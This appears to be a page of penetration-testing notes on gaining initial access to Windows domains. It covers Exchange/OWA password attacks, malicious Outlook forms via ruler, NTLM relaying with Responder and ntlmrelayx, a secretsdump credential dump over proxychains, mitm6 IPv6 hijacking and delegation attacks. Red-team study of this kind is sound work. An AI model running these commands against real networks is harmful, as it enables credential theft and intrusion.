You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
It is possible to get access by abusing a lot of web attacks which might give you access to the system. There are to many to subscribe here, but I might make a list someday.
Password Attacks
Exchange / OWA
Attah path could be: Reconnaissance --> OWA Discovery --> Internal Domain Discovery --> Naming scheme fuzzing --> Username enumeration --> Password discovery --> GAL Extraction --> More Password discovery --> 2fa bypass --> Remote Access through VPN/RDP / Malicious Outlook Rules or Forms / Internal Phishing
Collection of data (OSINT)
Collect e-mail adresses, usernames, passwords, get the email/user account naming scheme with tools such as:
Run a local Outlook instance using the target's credentials and import the malicious rule you created (File --> Manager Rules & Alerts --> Options --> Improt rules)
Send the trigger email.
Malicious Outlook Forms
If the path is applied that disables Run Application and Run Script rules this still works!
Attack prequisites:
Identification of valid credentials
Exchange service access
KB4011091 for outlook 2016 seems to block VBSCript in forms
.\ruler --email <EMAIL> form add --suffix form_name --input /tmp/command.txt --send
From the inside
Web Attacks2
It is possible to get access by abusing a lot of web attacks which might give you access to the system. There are to many to subscribe here, but I might make a list someday.
we have to modify the Responder.conf file and disable the HTTP and SMB servers (as NTLM relay will be our SMB and HTTP server).
the -d flag has now been changed from “Enable answers for NETBIOS domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False” to “Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False”. It should also be noted that -d as it is now CAN have an impact on your client’s network, as you are effectively poisoning the WPAD file over DHCP, which does not always revert back immediately once you stop the attack. It will likely require a reboot.
Use the socks option to be able to use the socks command to get a nice overview of the relayed attempts. It will also keep the SMB connection open indefinitely.
Responder -I eth0
ntlmrelayx.py -tf smb_hosts_nosigning.txt --socks
# Get overview of all relay attempts
ntlmrelayx> socks
# Change socks proxy
sudo vim /etc/proxychains4.conf
socks4 127.0.0.1 1080
# Use proxychains and it will ignore the password value and use the relay credential instead
proxychains python3 secretsdump.py <DOMAIN>/<USER>:IDontCareAboutPassword@<TARGET>
# Also possible to access shares on the network, for example if user is not local admin
proxychains python3 smbclient.py <DOMAIN>/<USER>:IDontCareAboutPassword@<TARGET>
LDAP Relaying
With mitm6
In modern Windows operating systems, IPv6 is enabled by default. This means that systems periodically poll for an IPv6 lease, as IPv6 is a newer protocol than IPv4, and Microsoft decided it was a good idea to give IPv6 precedence over IPv4.
However, in the vast majority of organizations, IPv6 is left unused, which means that an adversary could hijack the DHCP requests for IPv6 addresses and force authentication attempts to the attacker-controlled system. We do that by setting our system as the primary DNS server.
When computer account is created. This account can be used to enumerate the domain!
Resource Based Constrained Delegation Webclient Attack
Requirements:
On a Domain Controller to have the LDAP server signing not enforced (default value) (Requires authentication to check)
On a Domain Controller to have the LDAPS channel binding not required (default value)
Able to add new machines accounts (default value this quota is 10) (Requires authentication to check)
On the network, machines with WebClient running (some OS version had this service running by default or use the webclient starting trick from DTMSecurity) (Requires authentication to check)
A DNS record pointing to the attacker’s machine (By default authenticated users can do this) (Requires authentication to add)
When computer account is created. This account can be used to enumerate the domain!
Check for a user to impersonate
Preferably a user that would be admin on the machine (Check BloodHound). Maybe another command to check if user is admin on a machine? Is that possible? We should check!
User should not be part of "Protected Users group" or accounts with the "This account is sensitive and cannot be delegated" right